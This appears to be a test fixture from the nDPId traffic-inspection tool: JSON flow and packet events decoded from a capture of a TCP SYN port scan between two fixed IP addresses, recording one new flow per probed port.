-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1800,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1800,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1790,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsZRYAADAGs1ysEAAIQA2GNIzSFbPdUoMYAAAAAGACBAAe3AAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1801,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1801,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1791,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsmgoAADQGemisEAAIQA2GNIzS1xDdUoMYAAAAAGACBABdfgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1802,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1802,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1792,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsSTIAACkG1kCsEAAIQA2GNIzSCHDdUoMYAAAAAGACCAAoHwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1803,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8654,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1803,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1793,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsfbAAACoGoMKsEAAIQA2GNIzSIc7dUoMYAAAAAGACDAAKwQAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1804,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1804,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1794,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAs7GIAACkGMxCsEAAIQA2GNIzSw1bdUoMYAAAAAGACCABtOAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1805,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061108,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1805,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1795,"flow_packet_id":1,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061108,"pkt":"ACYLMQczACWzv5HuCABFAAAsus4AACoGY6SsEAAIQA2GNIzSCT7dUoMYAAAAAGACDAAjUQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1806,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1806,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1796,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAszkkAADsGPymsEAAIQA2GNIzSW87dUoMYAAAAAGACEADMwAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1807,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1063,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1807,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1797,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsUbIAADYGwMCsEAAIQA2GNIzSBCfdUoMYAAAAAGACDAAoaAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1808,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1808,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1798,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsplEAADUGbSGsEAAIQA2GNIzSE4vdUoMYAAAAAGACCAAdBAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1809,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1799,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsursAADMGWresEAAIQA2GNIzSxczdUoMYAAAAAGACEABiwgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1810,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1810,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1800,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsJh4AAC4G9FSsEAAIQA2GNIzSBIDdUoMYAAAAAGACDAAoDwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1811,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27353,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1811,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1801,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsq7AAACUGd8KsEAAIQA2GNIzSatndUoMYAAAAAGACCADFtQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1812,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1812,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1802,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAs3t0AADYGM5WsEAAIQA2GNIzSG1\/dUoMYAAAAAGACDAARMAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1813,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1813,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1803,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsZAcAADUGr2usEAAIQA2GNIzSFxvdUoMYAAAAAGACCAAZdAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1814,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1814,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1804,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAs3XEAADEGOgGsEAAIQA2GNIzSBNLdUoMYAAAAAGACCAArvQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1815,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5925,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1815,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1805,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAs7\/kAADEGJ3msEAAIQA2GNIzSFyXdUoMYAAAAAGACCAAZagAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1816,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061111,"flow_last_seen":1278275061111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061111,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1816,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1806,"flow_packet_id":1,"flow_last_seen":1278275061111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061111,"pkt":"ACYLMQczACWzv5HuCABFAAAs8psAADoGG9esEAAIQA2GNIzSxNXdUoMYAAAAAGACDABnuQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1817,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061153,"flow_last_seen":1278275061153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061153,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1149,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1817,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1807,"flow_packet_id":1,"flow_last_seen":1278275061153,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061153,"pkt":"ACYLMQczACWzv5HuCABFAAAsvXUAADkGUf2sEAAIQA2GNIzTBH3dU4MZAAAAAGACCAAsDwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1818,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1818,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1808,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAs9iAAADMGH1KsEAAIQA2GNIzTQmHdU4MZAAAAAGACEADmKgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1809,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsvj8AADkGUTOsEAAIQA2GNIzTGWbdU4MZAAAAAGACCAAXJgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1810,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsM3gAADYG3vqsEAAIQA2GNIzT\/23dU4MZAAAAAGACDAAtHgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1821,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1821,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1811,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAszqIAADIGR9CsEAAIQA2GNIzTD0rdU4MZAAAAAGACDAAdQgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1822,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1057,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1822,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1812,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAs9AQAACkGK26sEAAIQA2GNIzTBCHdU4MZAAAAAGACCAAsawAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1823,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1823,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1813,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAs1iEAACcGS1GsEAAIQA2GNIzTF3TdU4MZAAAAAGACEAARGAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1824,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6789,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 